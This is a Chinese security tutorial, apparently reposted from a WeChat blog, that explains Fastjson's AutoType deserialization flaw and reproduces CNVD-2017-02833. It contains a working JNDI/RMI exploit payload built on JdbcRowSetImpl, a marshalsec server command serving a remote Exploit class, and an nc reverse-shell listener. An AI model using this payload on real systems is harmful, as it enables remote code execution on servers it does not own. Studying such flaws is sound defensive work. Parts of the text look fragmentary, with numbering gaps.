Web篇 | Fastjson反序列化漏洞深度剖析：成因、挖掘思路与防范攻略（上）

Fastjson介绍

相关概念及Fastjson反序列化漏洞原理

复现RCE CNVD-2017-02833漏洞

RCE CNVD-2017-02833漏洞演进

Fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

https://github.com/alibaba/fastjson/wiki/Quick-Start-CN

(2) Alibaba开源系列：

Druid、Fastjson、Dubbo、OceanBase、Tengine、TFS、RocketMQ、Canal等等。

https://github.com/orgs/alibaba/repositories

(3) 序列化或反序列化组件有哪些？

(1) 什么是json？

{    "name":"BossFrank",    "age":23,    "media":["CSDN","bilibili","Github"]}

json本质就是一种字符串，用于信息的存储和交换。

在文章《Web篇 | 一文掌握Java反序列化漏洞，干货！（上）》中也有讲解json的由来。

https://mp.weixin.qq.com/s/GqjOwAJPFKMj4x7vx08o0A

(2) Fastjson反序列化漏洞原理：

Fastjson的漏洞本质还是一个java的反序列化漏洞。

Fastjson在序列化的时候就会使用AutoType功能进行对序列化后的JSON字符带有一个@type来标记其字符的原始类型，在反序列化的时候会读取这个@type，来试图把JSON内容反序列化到对象，并且会调用这个库的setter或者getter方法。

然而，@type的类有可能被恶意构造，只需要合理构造一个JSON，使用@type指定一个想要的攻击类库就可以实现攻击。

(3) 为什么要使用AutoType功能？

Fastjson在序列化以及反序列化的过程中并没有使用Java自带的序列化机制，而是自定义了一套机制。其实，对于JSON框架来说，想要把一个Java对象转换成字符串，可以有两种选择：

1.基于setter/getter

2.基于属性（AutoType）

基于setter/getter会带来什么问题呢，下面举个例子，假设有如下两个类：

class Apple implements Fruit {    private Big_Decimal price;    //省略 setter/getter、toString等}

class iphone implements Fruit {    private Big_Decimal price;    //省略 setter/getter、toString等}

实例化对象之后，假设苹果对象的price为0.5，Apple类对象序列化为json格式后为：

{    "Fruit":{    "price":0.5    }}

假设iphone对象的price为5000,序列化为json格式后为：

{    "Fruit":{    "price":5000    }}

当一个类只有一个接口的时候，将这个类的对象序列化的时候，就会将子类抹去（apple/iphone）只保留接口的类型(Fruit)，最后导致反序列化时无法得到原始类型。本例中，将两个json再反序列化生成java对象的时候，无法区分原始类是apple还是iphone。

为了解决上述问题：fastjson引入了基于属性（AutoType），即在序列化的时候，先把原始类型记录下来。使用@type的键记录原始类型，在本例中，引入AutoType后，Apple类对象序列化为json格式后为：

{     "fruit":{    "@type":"com.hollis.lab.fastjson.test.Apple",     "price":0.5     } }

引入AutoType后，iphone类对象序列化为json格式后为：

{     "fruit":{    "@type":"com.hollis.lab.fastjson.test.iphone",     "price":5000     } }

这样在反序列化的时候就可以区分原始的类了。

sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl，其中有个dataSourceName方法支持传入一个rmi的源，只要解析其中的url就会支持远程调用。

(5) 什么是rmi？

RMI（Remote Method Invocation，远程方法调用）是Java语言中用于实现分布式系统的机制，允许一个Java虚拟机（JVM）上的对象调用另一个JVM（通常位于不同计算机）上的对象方法。它是Java原生支持的远程通信技术，常用于构建跨网络的分布式应用。

简单讲就是一个机器执行另一个机器给的命令，且不回显。

该漏洞还需一台rmi服务器。

S1：攻击者访问存在fastjson漏洞的目标靶机网站，通过burpsuite抓包改包，以json格式添加com.sun.rowset.JdbcRowSetImpl恶意类信息发送给目标机。

S2：存在漏洞的靶机对json反序列化时候，会加载执行我们构造的恶意信息(访问rmi服务器)，靶机服务器就会向rmi服务器请求待执行的命令。

S3：rmi服务器请求加载远程机器的class（这个远程机器是我们搭建好的恶意站点，提前将漏洞利用的代码编译得到.class文件，并上传至恶意站点），得到攻击者构造好的命令（ping dnslog或者创建文件或者反弹shell啥的）

S4：rmi将远程加载得到的class（恶意代码），作为响应返回给靶机服务器。

S5：靶机服务器执行了恶意代码，被攻击者成功利用。

python -m http.server 9999

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.127.128:9999/#Exploit" 6666

nc -lvp 1888

{    "name":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "x":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://192.168.127.128:6666/Exploit",        "autoCommit":true    }}

在fastjson中有一个全局缓存，在类加载的时候，如果autotype功能没开启，就会先尝试从缓存中获取类，如果缓存中有，则直接返回。

java.lang.Class类对应的deserializer为MiscCodec，反序列化时会取json串中的val值并加载这个val对应的类。如果fastjson cache为true，就会缓存这个val对应的class到全局缓存中。

 没看够~？欢迎关注！

原文始发于微信公众号（零日安全实验室）：Web篇 | Fastjson反序列化漏洞深度剖析：成因、挖掘思路与防范攻略（上）